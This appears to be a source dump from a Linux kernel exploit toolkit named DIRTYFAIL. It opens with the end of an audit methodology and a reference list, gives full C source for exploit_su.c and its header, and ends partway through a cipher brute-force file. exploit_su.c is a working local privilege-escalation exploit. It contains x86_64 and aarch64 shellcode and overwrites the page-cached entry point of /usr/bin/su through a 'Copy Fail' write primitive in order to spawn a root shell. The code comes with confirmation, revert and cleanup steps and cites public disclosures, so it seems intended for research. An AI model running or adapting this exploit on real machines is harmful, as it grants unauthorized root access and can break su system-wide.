already covered by the algif_skcipher audit (§1.3b).
- **Bluetooth CMTP/HIDP crypto** — privileged-only (HCI device
access), not an unprivileged-LPE vector.
- **Kernel TLS NIC offload** — encryption runs on the NIC firmware,
different threat surface entirely (firmware-side bug, not
page-cache-write).
- **dm-crypt / fscrypt** — block-layer / filesystem-layer
encryption. Different threat model; user can't splice arbitrary
page-cache pages into block requests in any meaningful way.
### §1.6 Methodology
For each candidate path, read the input handler and ask:
1. Does it call `skb_cow_data()` BEFORE building the AEAD
scatterlist?
2. Is there a conditional branch (typically based on `skb_cloned`,
`skb_has_frag_list`, `skb_is_nonlinear`) that bypasses (1)?
3. Is the resulting scatterlist used as BOTH src AND dst of
`aead_request_set_crypt()` / equivalent?
4. Can a userspace primitive (`splice(2)`, `sendfile(2)`,
`sendmsg(MSG_SPLICE_PAGES)`, AF_ALG send) deliver
attacker-controlled pages into the input skb's frags?
All four must be true for the bug class to apply. A single "no" is
sufficient for "not vulnerable."
---
## §2. References
- V4bel/dirtyfrag write-up — [github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md](https://github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md)
- Theori/Xint Copy Fail disclosure — [xint.io/blog/copy-fail-linux-distributions](https://xint.io/blog/copy-fail-linux-distributions)
- LWN — Replace sendpage with sendmsg(MSG_SPLICE_PAGES) — [lwn.net/Articles/928487](https://lwn.net/Articles/928487/)
- LWN — Handle MSG_SPLICE_PAGES in AF_TLS — [lwn.net/Articles/933386](https://lwn.net/Articles/933386/)
- TLS 1.3 Rx improvements (Kicinski) — [people.kernel.org/kuba/tls-1-3-rx-improvements-in-linux-5-20](https://people.kernel.org/kuba/tls-1-3-rx-improvements-in-linux-5-20)
- 0xdeadbeefnetwork Copy_Fail2 (GCM variant) — [github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo](https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo)
- Linux source (torvalds/master) — `net/ipv4/ah4.c`, `net/ipv6/ah6.c`, `net/xfrm/xfrm_ipcomp.c`, `drivers/net/macsec.c`, `net/tls/tls_sw.c`
+530
View File
@@ -0,0 +1,530 @@
/*
* DIRTYFAIL exploit_su.c
*
* V4bel-style page-cache shellcode injection against /usr/bin/su.
* See exploit_su.h for the high-level rationale.
*/
#include "exploit_su.h"
#include "copyfail.h"
#include "common.h"
#ifdef __linux__
#include <elf.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
#define SU_PATH "/usr/bin/su"
#define STATE_PATH "/var/tmp/.dirtyfail-su.state"
#define STATE_MAGIC "DFSU0001"
/* x86_64 shellcode: setuid(0); setgid(0); execve("/bin/sh", argv, NULL)
* with argv = ["/bin/sh", NULL]. The proper argv matters: NULL argv
* makes the kernel substitute argv[0]="" (printk: "launched '/bin/sh'
* with NULL argv: empty string added"), and bash/sh-as-init-script
* with empty argv[0] doesn't read commands from stdin reliably.
*
* Layout:
* 0x00 xor rdi, rdi ; mov eax, 105 ; syscall setuid(0) [10]
* 0x0a xor rdi, rdi ; mov eax, 106 ; syscall setgid(0) [10]
* 0x14 mov rbx, "/bin/sh\0" ; push rbx pathname on stack [11]
* 0x1f mov r9, rsp r9 = path ptr [3]
* 0x22 xor rax, rax ; push rax ; push r9 argv = [path,NULL][6]
* 0x28 mov rsi, rsp ; mov rdi, r9 argv, pathname [6]
* 0x2e xor rdx, rdx ; mov eax, 0x3b ; syscall envp=NULL, execve [10]
*
* Total: 56 bytes = 14 chained 4-byte writes via cf_4byte_write. */
__attribute__((unused))
static const unsigned char shellcode_x86_64[56] = {
/* setuid(0) — 10 bytes */
0x48,0x31,0xff,
0xb8,0x69,0x00,0x00,0x00,
0x0f,0x05,
/* setgid(0) — 10 bytes */
0x48,0x31,0xff,
0xb8,0x6a,0x00,0x00,0x00,
0x0f,0x05,
/* mov rbx, "/bin/sh\0" ; push rbx — 11 bytes */
0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,
0x53,
/* mov r9, rsp — 3 bytes */
0x49,0x89,0xe1,
/* xor rax, rax ; push rax ; push r9 — 6 bytes */
0x48,0x31,0xc0,
0x50,
0x41,0x51,
/* mov rsi, rsp ; mov rdi, r9 — 6 bytes */
0x48,0x89,0xe6,
0x4c,0x89,0xcf,
/* xor rdx, rdx ; mov eax, 0x3b ; syscall — 10 bytes */
0x48,0x31,0xd2,
0xb8,0x3b,0x00,0x00,0x00,
0x0f,0x05,
};
/* aarch64 shellcode: same semantics as x86_64 above (setuid(0),
* setgid(0), execve("/bin/sh", ["/bin/sh", NULL], NULL)) encoded for
* the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args,
* `svc #0` to invoke). 20 instructions × 4 bytes = 80 bytes.
*
* STATUS: UNTESTED on hardware. The bytes were derived by manually
* cross-referencing each instruction against the ARMv8-A reference
* manual; the matching assembly source ships in
* `tools/exploit_su_aarch64.S` so anyone with `aarch64-linux-gnu-as`
* can regenerate and verify. Runtime is gated behind the env var
* `DIRTYFAIL_AARCH64_TRUST_UNTESTED=1` to prevent accidental use. */
__attribute__((unused))
static const unsigned char shellcode_aarch64[80] = {
/* setuid(0) — movz x0,#0 ; movz x8,#146 ; svc #0 */
0x00,0x00,0x80,0xd2,
0x48,0x12,0x80,0xd2,
0x01,0x00,0x00,0xd4,
/* setgid(0) — movz x0,#0 ; movz x8,#144 ; svc #0 */
0x00,0x00,0x80,0xd2,
0x08,0x12,0x80,0xd2,
0x01,0x00,0x00,0xd4,
/* "/bin/sh\0" -> x9 (4× movz/movk lsl) */
0xe9,0x45,0x8c,0xd2, /* movz x9, #0x622f */
0x29,0xcd,0xad,0xf2, /* movk x9, #0x6e69, lsl 16 */
0xe9,0x65,0xce,0xf2, /* movk x9, #0x732f, lsl 32 */
0x09,0x0d,0xe0,0xf2, /* movk x9, #0x0068, lsl 48 */
/* push string : sp -= 16 ; *sp = x9 */
0xe9,0x0f,0x1f,0xf8, /* str x9, [sp, #-16]! */
0xe9,0x03,0x00,0x91, /* mov x9, sp */
/* argv = [x9, NULL] on stack */
0xff,0x43,0x00,0xd1, /* sub sp, sp, #16 */
0xff,0x07,0x00,0xf9, /* str xzr, [sp, #8] */
0xe9,0x03,0x00,0xf9, /* str x9, [sp, #0] */
/* execve(x9, sp, NULL) — syscall 221 */
0xe0,0x03,0x09,0xaa, /* mov x0, x9 */
0xe1,0x03,0x00,0x91, /* mov x1, sp */
0xe2,0x03,0x1f,0xaa, /* mov x2, xzr */
0xa8,0x1b,0x80,0xd2, /* movz x8, #221 */
0x01,0x00,0x00,0xd4, /* svc #0 */
};
/* Build-time arch selection: pick the right shellcode at compile time
* based on the target architecture. SHELLCODE_LEN must be a multiple
* of 4 since cf_4byte_write plants 4 bytes at a time. The unused
* sibling shellcode array is suppressed with __attribute__((unused))
* up at its definition. */
#if defined(__x86_64__) || defined(__amd64__)
# define SHELLCODE_BYTES shellcode_x86_64
# define SHELLCODE_LEN ((int)sizeof(shellcode_x86_64))
# define SHELLCODE_ARCH "x86_64"
# define SHELLCODE_TESTED 1
# define SHELLCODE_PRESENT 1
#elif defined(__aarch64__)
# define SHELLCODE_BYTES shellcode_aarch64
# define SHELLCODE_LEN ((int)sizeof(shellcode_aarch64))
# define SHELLCODE_ARCH "aarch64"
# define SHELLCODE_TESTED 0
# define SHELLCODE_PRESENT 1
#else
# define SHELLCODE_BYTES shellcode_x86_64 /* placeholder, never used */
# define SHELLCODE_LEN 0
# define SHELLCODE_ARCH "unknown"
# define SHELLCODE_TESTED 0
# define SHELLCODE_PRESENT 0
#endif
/* Convenience name kept matching pre-existing usages. */
#define shellcode SHELLCODE_BYTES
/* State file: stash original entry-point bytes so we can revert. */
struct su_state {
char magic[8]; /* "DFSU0001" */
char target_path[256];
uint64_t file_offset;
uint64_t original_len; /* always SHELLCODE_LEN, but explicit for forward-compat */
unsigned char original[SHELLCODE_LEN];
};
/* ---------------------------------------------------------------- *
* ELF parsing find the file offset of the entry point in /usr/bin/su.
* ---------------------------------------------------------------- */
static bool resolve_entry_offset(const char *path, off_t *out_offset)
{
int fd = open(path, O_RDONLY);
if (fd < 0) {
log_bad("open %s: %s", path, strerror(errno));
return false;
}
Elf64_Ehdr ehdr;
if (pread(fd, &ehdr, sizeof(ehdr), 0) != sizeof(ehdr)) {
log_bad("read ELF header: %s", strerror(errno));
close(fd); return false;
}
if (memcmp(ehdr.e_ident, ELFMAG, 4) != 0) {
log_bad("%s is not an ELF file", path);
close(fd); return false;
}
if (ehdr.e_ident[EI_CLASS] != ELFCLASS64) {
log_bad("%s is not 64-bit ELF (this exploit requires x86_64)", path);
close(fd); return false;
}
if (ehdr.e_machine != EM_X86_64) {
log_bad("%s is not x86_64 (machine=0x%x); shellcode is x86_64-only",
path, ehdr.e_machine);
close(fd); return false;
}
/* Walk program headers to find the LOAD segment containing e_entry. */
Elf64_Phdr phdr;
bool found = false;
for (int i = 0; i < ehdr.e_phnum; i++) {
off_t poff = ehdr.e_phoff + (off_t)i * ehdr.e_phentsize;
if (pread(fd, &phdr, sizeof(phdr), poff) != sizeof(phdr)) {
log_bad("read phdr[%d]: %s", i, strerror(errno));
close(fd); return false;
}
if (phdr.p_type != PT_LOAD) continue;
if (!(phdr.p_flags & PF_X)) continue; /* must be executable */
if (ehdr.e_entry < phdr.p_vaddr) continue;
if (ehdr.e_entry >= phdr.p_vaddr + phdr.p_memsz) continue;
*out_offset = phdr.p_offset + (ehdr.e_entry - phdr.p_vaddr);
found = true;
break;
}
close(fd);
if (!found) {
log_bad("could not locate executable LOAD segment containing e_entry "
"(0x%llx) in %s", (unsigned long long)ehdr.e_entry, path);
return false;
}
/* Sanity: ensure the 48-byte plant region fits inside the file. */
struct stat st;
if (stat(path, &st) < 0) { log_bad("stat: %s", strerror(errno)); return false; }
if ((uint64_t)*out_offset + SHELLCODE_LEN > (uint64_t)st.st_size) {
log_bad("entry offset 0x%llx + %d would overflow %s (size 0x%llx)",
(unsigned long long)*out_offset, SHELLCODE_LEN,
path, (unsigned long long)st.st_size);
return false;
}
return true;
}
/* ---------------------------------------------------------------- *
* Backup / revert
* ---------------------------------------------------------------- */
static bool save_original(const char *path, off_t off)
{
int fd = open(path, O_RDONLY);
if (fd < 0) { log_bad("open %s: %s", path, strerror(errno)); return false; }
struct su_state st = {0};
memcpy(st.magic, STATE_MAGIC, 8);
strncpy(st.target_path, path, sizeof(st.target_path) - 1);
st.file_offset = (uint64_t)off;
st.original_len = SHELLCODE_LEN;
if (pread(fd, st.original, SHELLCODE_LEN, off) != SHELLCODE_LEN) {
log_bad("pread original 48 bytes: %s", strerror(errno));
close(fd); return false;
}
close(fd);
int sfd = open(STATE_PATH, O_WRONLY | O_CREAT | O_TRUNC, 0600);
if (sfd < 0) { log_bad("open %s: %s", STATE_PATH, strerror(errno)); return false; }
if (write(sfd, &st, sizeof(st)) != sizeof(st)) {
log_bad("write state: %s", strerror(errno));
close(sfd); unlink(STATE_PATH); return false;
}
close(sfd);
log_ok("stashed original %d bytes from %s+0x%llx → %s",
SHELLCODE_LEN, path, (unsigned long long)off, STATE_PATH);
return true;
}
/* Read state, return false if missing or malformed. */
static bool load_state(struct su_state *out)
{
int sfd = open(STATE_PATH, O_RDONLY);
if (sfd < 0) {
log_bad("open %s: %s", STATE_PATH, strerror(errno));
return false;
}
if (read(sfd, out, sizeof(*out)) != sizeof(*out)) {
log_bad("read state: %s", strerror(errno));
close(sfd); return false;
}
close(sfd);
if (memcmp(out->magic, STATE_MAGIC, 8) != 0) {
log_bad("state file magic mismatch");
return false;
}
if (out->original_len != SHELLCODE_LEN) {
log_bad("state file original_len=%llu (expected %d)",
(unsigned long long)out->original_len, SHELLCODE_LEN);
return false;
}
return true;
}
/* ---------------------------------------------------------------- *
* Plant + verify
* ---------------------------------------------------------------- */
static bool plant_shellcode(const char *path, off_t base_off,
const unsigned char *bytes, size_t len)
{
if (len % 4 != 0) { log_bad("plant len %zu not multiple of 4", len); return false; }
log_step("planting %zu bytes of shellcode via %zu chained 4-byte writes",
len, len / 4);
for (size_t i = 0; i < len; i += 4) {
unsigned char chunk[4];
memcpy(chunk, bytes + i, 4);
if (!cf_4byte_write(path, base_off + (off_t)i, chunk)) {
log_bad("cf_4byte_write[%zu] failed at offset 0x%llx",
i / 4, (unsigned long long)(base_off + i));
return false;
}
/* Compact progress dot per chunk; no full-line spam. */
fputc('.', stdout); fflush(stdout);
}
fputc('\n', stdout);
return true;
}
static bool verify_plant(const char *path, off_t off,
const unsigned char *expected, size_t len)
{
int fd = open(path, O_RDONLY);
if (fd < 0) { log_bad("verify open: %s", strerror(errno)); return false; }
unsigned char got[SHELLCODE_LEN];
if (pread(fd, got, len, off) != (ssize_t)len) {
log_bad("verify pread: %s", strerror(errno));
close(fd); return false;
}
close(fd);
return memcmp(got, expected, len) == 0;
}
/* try_revert_su_pages: best-effort revert. We don't have CAP_SYS_ADMIN
* to drop_caches in init ns from an unprivileged process, but
* POSIX_FADV_DONTNEED on a freshly-opened fd typically evicts the
* affected pages on most kernels. */
static bool try_revert_su_pages(const char *path, off_t off,
const unsigned char *original, size_t len)
{
if (!plant_shellcode(path, off, original, len)) {
log_warn("revert plant failed — page cache may still be poisoned");
return false;
}
int fd = open(path, O_RDONLY);
if (fd >= 0) {
#ifdef POSIX_FADV_DONTNEED
posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
#endif
close(fd);
}
/* Verify the revert landed correctly. */
if (!verify_plant(path, off, original, len)) {
log_warn("revert verification failed — bytes do not match original");
return false;
}
return true;
}
/* ---------------------------------------------------------------- *
* Public entry points
* ---------------------------------------------------------------- */
df_result_t exploit_su_shellcode(bool do_shell)
{
log_step("Copy Fail — /usr/bin/su page-cache shellcode injection");
const char *target = getenv("DIRTYFAIL_SU_PATH");
if (!target || !*target) target = SU_PATH;
/* Architecture preflight. We ship two shellcodes:
* x86_64 tested end-to-end on Fedora 44 (real-root proven).
* aarch64 manually encoded from the ARMv8-A reference,
* never executed on hardware. Gated behind an env
* var so an aarch64 user has to opt in explicitly.
* Anything else has no shellcode and aborts here. */
if (!SHELLCODE_PRESENT) {
log_bad("no shellcode for this architecture (built for %s); "
"DIRTYFAIL --exploit-su currently supports x86_64 and "
"aarch64 only.", SHELLCODE_ARCH);
return DF_PRECOND_FAIL;
}
if (!SHELLCODE_TESTED && !getenv("DIRTYFAIL_AARCH64_TRUST_UNTESTED")) {
log_bad("running on %s, where the shipped shellcode has NOT been "
"tested on hardware. Aborting to avoid bricking /usr/bin/su.",
SHELLCODE_ARCH);
log_hint("if you've reviewed tools/exploit_su_aarch64.S and want to "
"proceed at your own risk, set "
"DIRTYFAIL_AARCH64_TRUST_UNTESTED=1 in the environment.");
log_hint("recommended verification: assemble the .S file with "
"`aarch64-linux-gnu-as` and confirm the byte sequence "
"matches `shellcode_aarch64[]` in src/exploit_su.c.");
return DF_PRECOND_FAIL;
}
if (!SHELLCODE_TESTED) {
log_warn("DIRTYFAIL_AARCH64_TRUST_UNTESTED=1: proceeding with "
"untested aarch64 shellcode (%d bytes). If /usr/bin/su "
"breaks, run `dirtyfail --cleanup-su` (or reboot) to "
"evict the modified page from the cache.", SHELLCODE_LEN);
}
struct stat st;
if (stat(target, &st) < 0) {
log_bad("stat %s: %s", target, strerror(errno));
return DF_PRECOND_FAIL;
}
if (!(st.st_mode & S_ISUID) || st.st_uid != 0) {
log_bad("%s is not setuid root (mode=0%o uid=%u)",
target, st.st_mode, st.st_uid);
log_hint("the exploit relies on the setuid bit; without it, the "
"shellcode runs at our existing uid and gains nothing.");
return DF_PRECOND_FAIL;
}
off_t entry_off;
if (!resolve_entry_offset(target, &entry_off)) return DF_TEST_ERROR;
log_ok("/usr/bin/su entry point at file offset 0x%llx",
(unsigned long long)entry_off);
log_warn("about to overwrite %d bytes of %s in the page cache",
SHELLCODE_LEN, target);
log_warn("if this fails or the shellcode crashes, /usr/bin/su will be "
"broken system-wide until --cleanup-su or `drop_caches`");
/* CRITICAL: disable libc stdin buffering before the typed_confirm
* read. Otherwise fgets() pulls extra bytes from the pipe into libc's
* buffer, which is lost when execve() replaces our process the
* exec'd /bin/sh then sees empty stdin and exits without running
* any commands the user piped in. With _IONBF, fgets does 1-byte
* reads and leaves the kernel pipe intact. */
setvbuf(stdin, NULL, _IONBF, 0);
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined");
return DF_OK;
}
if (!save_original(target, entry_off)) return DF_TEST_ERROR;
if (!plant_shellcode(target, entry_off, shellcode, SHELLCODE_LEN)) {
log_warn("plant failed mid-stream — attempting revert");
struct su_state st_in;
if (load_state(&st_in) &&
try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) {
unlink(STATE_PATH);
}
return DF_EXPLOIT_FAIL;
}
if (!verify_plant(target, entry_off, shellcode, SHELLCODE_LEN)) {
log_bad("verify: page cache does not match planted shellcode "
"(kernel likely patched, or AF_ALG/algif_aead blocked)");
struct su_state st_in;
if (load_state(&st_in) &&
try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) {
unlink(STATE_PATH);
}
return DF_EXPLOIT_FAIL;
}
log_ok("page cache of %s now contains shellcode at entry point", target);
if (!do_shell) {
log_step("--no-shell: reverting via DONTNEED+rewrite");
struct su_state st_in;
if (load_state(&st_in) &&
try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) {
log_ok("page cache reverted successfully");
unlink(STATE_PATH);
} else {
log_warn("revert may have failed — run `sudo dirtyfail --cleanup-su` "
"or reboot before using su again");
}
return DF_EXPLOIT_OK;
}
log_ok("invoking %s — kernel will exec setuid-root, jump to our shellcode, "
"and drop a /bin/sh root shell", target);
log_hint("when you exit the shell, run `sudo dirtyfail --cleanup-su` to "
"restore /usr/bin/su (or reboot — page cache is RAM-only)");
execl(target, "su", (char *)NULL);
log_bad("execl: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
/* Describe state file if present, for `--list-state`. Returns true if
* an exploit-su state file was found and described, false if absent.
* Silent when file is missing (the normal case). */
bool exploit_su_list_state(void)
{
struct stat ignored;
if (stat(STATE_PATH, &ignored) < 0) return false; /* clean state */
struct su_state st_in;
if (!load_state(&st_in)) return false;
log_warn("/usr/bin/su shellcode planted — state file %s", STATE_PATH);
log_hint(" target: %s, entry-point file offset: 0x%llx",
st_in.target_path, (unsigned long long)st_in.file_offset);
log_hint(" original %llu bytes stashed.",
(unsigned long long)st_in.original_len);
log_hint(" the page cache currently has x86_64 setuid+execve(/bin/sh)");
log_hint(" shellcode in place of the above. Revert with `--cleanup-su`.");
return true;
}
df_result_t cleanup_su_shellcode(void)
{
log_step("--cleanup-su: restore /usr/bin/su entry-point bytes from %s",
STATE_PATH);
struct su_state st_in;
if (!load_state(&st_in)) return DF_TEST_ERROR;
log_hint("target: %s, file_offset: 0x%llx", st_in.target_path,
(unsigned long long)st_in.file_offset);
if (!try_revert_su_pages(st_in.target_path, (off_t)st_in.file_offset,
st_in.original, SHELLCODE_LEN)) {
log_bad("revert failed — manual fix needed: "
"`echo 3 | sudo tee /proc/sys/vm/drop_caches`");
return DF_TEST_ERROR;
}
if (unlink(STATE_PATH) == 0) {
log_ok("page cache restored and state file removed");
} else {
log_warn("page cache restored but %s could not be removed: %s",
STATE_PATH, strerror(errno));
}
return DF_OK;
}
#else /* !__linux__ */
df_result_t exploit_su_shellcode(bool do_shell)
{
(void)do_shell;
return DF_TEST_ERROR;
}
df_result_t cleanup_su_shellcode(void)
{
return DF_TEST_ERROR;
}
bool exploit_su_list_state(void)
{
return false;
}
#endif
+56
View File
@@ -0,0 +1,56 @@
/*
* DIRTYFAIL exploit_su.h
*
* V4bel-style page-cache shellcode injection against /usr/bin/su.
*
* Different chain than the /etc/passwd UID-flip exploits:
* - Targets /usr/bin/su's ELF entry point in the page cache
* - Plants ~48 bytes of x86_64 shellcode (setuid(0); setgid(0);
* execve("/bin/sh")) via 12 chained 4-byte writes
* - When /usr/bin/su is exec'd, kernel sets euid=0 (setuid bit on
* disk, unaffected by page-cache mods), dynamic linker resolves,
* control transfers to entry point our shellcode /bin/sh
*
* Mitigation profile vs. /etc/passwd flip:
* + Bypasses `pam_unix nullok` removal no PAM dependency at all
* + Works even if password rotation policy enforces complex passwords
* - Crashes /usr/bin/su system-wide if shellcode is wrong (until
* drop_caches or reboot)
* - Stash-and-revert is the safety net: cleanup-su restores the
* original 48 bytes from /var/tmp/.dirtyfail-su.state.
*
* Architecture: x86_64 only for now. The shellcode is hardcoded for
* the SYSV amd64 syscall ABI. arm64/aarch64 would need a different
* shellcode blob and possibly a different entry-point fixup.
*
* Reference: V4bel/dirtyfrag's xfrm-ESP variant uses the same target
* file pattern with a different (4-byte) primitive. Theori's Xint
* disclosure uses /usr/bin/su as the canonical target.
*/
#ifndef DIRTYFAIL_EXPLOIT_SU_H
#define DIRTYFAIL_EXPLOIT_SU_H
#include "common.h"
/* End-to-end PoC: locate /usr/bin/su (or DIRTYFAIL_SU_PATH override),
* stash original entry-point bytes, plant shellcode, verify, and
* (if do_shell) invoke `su -` so the kernel exec's our hijacked
* /usr/bin/su as setuid root shellcode runs /bin/sh.
*
* `do_shell=false` runs the plant + verify + revert sequence useful
* for testing the primitive without leaving the system in a broken
* state (su would otherwise be unusable until drop_caches). */
df_result_t exploit_su_shellcode(bool do_shell);
/* Restore /usr/bin/su's original entry-point bytes from
* /var/tmp/.dirtyfail-su.state and drop_caches to evict the modified
* page. Returns DF_OK on success, DF_TEST_ERROR if state file is
* missing or the on-disk file no longer matches. */
df_result_t cleanup_su_shellcode(void);
/* Used by --list-state. Returns true if /var/tmp/.dirtyfail-su.state
* is present (and prints a summary), false if absent. Side-effect free. */
bool exploit_su_list_state(void);
#endif
+303
View File
@@ -0,0 +1,303 @@
/*
* DIRTYFAIL fcrypt.c
*
* Implementation of the rxkad fcrypt block cipher and a user-space
* brute-force search loop.
*
* ATTRIBUTION
* -----------
* The four 256-byte S-box tables (`SBOX0_RAW` `SBOX3_RAW`) and the
* 8-byte 56-bit key packing + 11-bit rotation key schedule are the
* standard rxkad / fcrypt protocol constants, also present in the
* Linux kernel `crypto/fcrypt.c` (GPL-2.0, David Howells / KTH).
*
* The implementation code below table preprocessing, round-key
* struct, brute-force harness, predicates is fresh DIRTYFAIL code.
* The cipher tables themselves are protocol facts; using them is what
* makes interoperability with the kernel possible.
*
* See NOTICE.md.
*
* SELF-TEST VECTORS (from the kernel test suite):
* K = 00 00 00 00 00 00 00 00 decrypt(0E0900C73EF7ED41) = 00000000 00000000
* K = 11 44 ?? ?? ?? ?? ?? 66 decrypt(D8ED787477EC0680) = 12345678 9ABCDEF0
*/
#include "fcrypt.h"
#include <arpa/inet.h> /* htonl == htonl, portable */
#include <time.h>
#include <string.h>
/* -------- raw S-box bytes ------------------------------------------------ *
*
* These are the rxkad protocol S-boxes, exactly as specified.
* They are pre-shifted into 32-bit form by fcrypt_init() so the inner
* round function (FF) is just four XORs of 32-bit lookups.
*/
static const uint8_t SBOX0_RAW[256] = {
0xea,0x7f,0xb2,0x64,0x9d,0xb0,0xd9,0x11,0xcd,0x86,0x86,0x91,0x0a,0xb2,0x93,0x06,
0x0e,0x06,0xd2,0x65,0x73,0xc5,0x28,0x60,0xf2,0x20,0xb5,0x38,0x7e,0xda,0x9f,0xe3,
0xd2,0xcf,0xc4,0x3c,0x61,0xff,0x4a,0x4a,0x35,0xac,0xaa,0x5f,0x2b,0xbb,0xbc,0x53,
0x4e,0x9d,0x78,0xa3,0xdc,0x09,0x32,0x10,0xc6,0x6f,0x66,0xd6,0xab,0xa9,0xaf,0xfd,
0x3b,0x95,0xe8,0x34,0x9a,0x81,0x72,0x80,0x9c,0xf3,0xec,0xda,0x9f,0x26,0x76,0x15,
0x3e,0x55,0x4d,0xde,0x84,0xee,0xad,0xc7,0xf1,0x6b,0x3d,0xd3,0x04,0x49,0xaa,0x24,
0x0b,0x8a,0x83,0xba,0xfa,0x85,0xa0,0xa8,0xb1,0xd4,0x01,0xd8,0x70,0x64,0xf0,0x51,
0xd2,0xc3,0xa7,0x75,0x8c,0xa5,0x64,0xef,0x10,0x4e,0xb7,0xc6,0x61,0x03,0xeb,0x44,
0x3d,0xe5,0xb3,0x5b,0xae,0xd5,0xad,0x1d,0xfa,0x5a,0x1e,0x33,0xab,0x93,0xa2,0xb7,
0xe7,0xa8,0x45,0xa4,0xcd,0x29,0x63,0x44,0xb6,0x69,0x7e,0x2e,0x62,0x03,0xc8,0xe0,
0x17,0xbb,0xc7,0xf3,0x3f,0x36,0xba,0x71,0x8e,0x97,0x65,0x60,0x69,0xb6,0xf6,0xe6,
0x6e,0xe0,0x81,0x59,0xe8,0xaf,0xdd,0x95,0x22,0x99,0xfd,0x63,0x19,0x74,0x61,0xb1,
0xb6,0x5b,0xae,0x54,0xb3,0x70,0xff,0xc6,0x3b,0x3e,0xc1,0xd7,0xe1,0x0e,0x76,0xe5,
0x36,0x4f,0x59,0xc7,0x08,0x6e,0x82,0xa6,0x93,0xc4,0xaa,0x26,0x49,0xe0,0x21,0x64,
0x07,0x9f,0x64,0x81,0x9c,0xbf,0xf9,0xd1,0x43,0xf8,0xb6,0xb9,0xf1,0x24,0x75,0x03,
0xe4,0xb0,0x99,0x46,0x3d,0xf5,0xd1,0x39,0x72,0x12,0xf6,0xba,0x0c,0x0d,0x42,0x2e,
};
static const uint8_t SBOX1_RAW[256] = {
0x77,0x14,0xa6,0xfe,0xb2,0x5e,0x8c,0x3e,0x67,0x6c,0xa1,0x0d,0xc2,0xa2,0xc1,0x85,
0x6c,0x7b,0x67,0xc6,0x23,0xe3,0xf2,0x89,0x50,0x9c,0x03,0xb7,0x73,0xe6,0xe1,0x39,
0x31,0x2c,0x27,0x9f,0xa5,0x69,0x44,0xd6,0x23,0x83,0x98,0x7d,0x3c,0xb4,0x2d,0x99,
0x1c,0x1f,0x8c,0x20,0x03,0x7c,0x5f,0xad,0xf4,0xfa,0x95,0xca,0x76,0x44,0xcd,0xb6,
0xb8,0xa1,0xa1,0xbe,0x9e,0x54,0x8f,0x0b,0x16,0x74,0x31,0x8a,0x23,0x17,0x04,0xfa,
0x79,0x84,0xb1,0xf5,0x13,0xab,0xb5,0x2e,0xaa,0x0c,0x60,0x6b,0x5b,0xc4,0x4b,0xbc,
0xe2,0xaf,0x45,0x73,0xfa,0xc9,0x49,0xcd,0x00,0x92,0x7d,0x97,0x7a,0x18,0x60,0x3d,
0xcf,0x5b,0xde,0xc6,0xe2,0xe6,0xbb,0x8b,0x06,0xda,0x08,0x15,0x1b,0x88,0x6a,0x17,
0x89,0xd0,0xa9,0xc1,0xc9,0x70,0x6b,0xe5,0x43,0xf4,0x68,0xc8,0xd3,0x84,0x28,0x0a,
0x52,0x66,0xa3,0xca,0xf2,0xe3,0x7f,0x7a,0x31,0xf7,0x88,0x94,0x5e,0x9c,0x63,0xd5,
0x24,0x66,0xfc,0xb3,0x57,0x25,0xbe,0x89,0x44,0xc4,0xe0,0x8f,0x23,0x3c,0x12,0x52,
0xf5,0x1e,0xf4,0xcb,0x18,0x33,0x1f,0xf8,0x69,0x10,0x9d,0xd3,0xf7,0x28,0xf8,0x30,
0x05,0x5e,0x32,0xc0,0xd5,0x19,0xbd,0x45,0x8b,0x5b,0xfd,0xbc,0xe2,0x5c,0xa9,0x96,
0xef,0x70,0xcf,0xc2,0x2a,0xb3,0x61,0xad,0x80,0x48,0x81,0xb7,0x1d,0x43,0xd9,0xd7,
0x45,0xf0,0xd8,0x8a,0x59,0x7c,0x57,0xc1,0x79,0xc7,0x34,0xd6,0x43,0xdf,0xe4,0x78,
0x16,0x06,0xda,0x92,0x76,0x51,0xe1,0xd4,0x70,0x03,0xe0,0x2f,0x96,0x91,0x82,0x80,
};
static const uint8_t SBOX2_RAW[256] = {
0xf0,0x37,0x24,0x53,0x2a,0x03,0x83,0x86,0xd1,0xec,0x50,0xf0,0x42,0x78,0x2f,0x6d,
0xbf,0x80,0x87,0x27,0x95,0xe2,0xc5,0x5d,0xf9,0x6f,0xdb,0xb4,0x65,0x6e,0xe7,0x24,
0xc8,0x1a,0xbb,0x49,0xb5,0x0a,0x7d,0xb9,0xe8,0xdc,0xb7,0xd9,0x45,0x20,0x1b,0xce,
0x59,0x9d,0x6b,0xbd,0x0e,0x8f,0xa3,0xa9,0xbc,0x74,0xa6,0xf6,0x7f,0x5f,0xb1,0x68,
0x84,0xbc,0xa9,0xfd,0x55,0x50,0xe9,0xb6,0x13,0x5e,0x07,0xb8,0x95,0x02,0xc0,0xd0,
0x6a,0x1a,0x85,0xbd,0xb6,0xfd,0xfe,0x17,0x3f,0x09,0xa3,0x8d,0xfb,0xed,0xda,0x1d,
0x6d,0x1c,0x6c,0x01,0x5a,0xe5,0x71,0x3e,0x8b,0x6b,0xbe,0x29,0xeb,0x12,0x19,0x34,
0xcd,0xb3,0xbd,0x35,0xea,0x4b,0xd5,0xae,0x2a,0x79,0x5a,0xa5,0x32,0x12,0x7b,0xdc,
0x2c,0xd0,0x22,0x4b,0xb1,0x85,0x59,0x80,0xc0,0x30,0x9f,0x73,0xd3,0x14,0x48,0x40,
0x07,0x2d,0x8f,0x80,0x0f,0xce,0x0b,0x5e,0xb7,0x5e,0xac,0x24,0x94,0x4a,0x18,0x15,
0x05,0xe8,0x02,0x77,0xa9,0xc7,0x40,0x45,0x89,0xd1,0xea,0xde,0x0c,0x79,0x2a,0x99,
0x6c,0x3e,0x95,0xdd,0x8c,0x7d,0xad,0x6f,0xdc,0xff,0xfd,0x62,0x47,0xb3,0x21,0x8a,
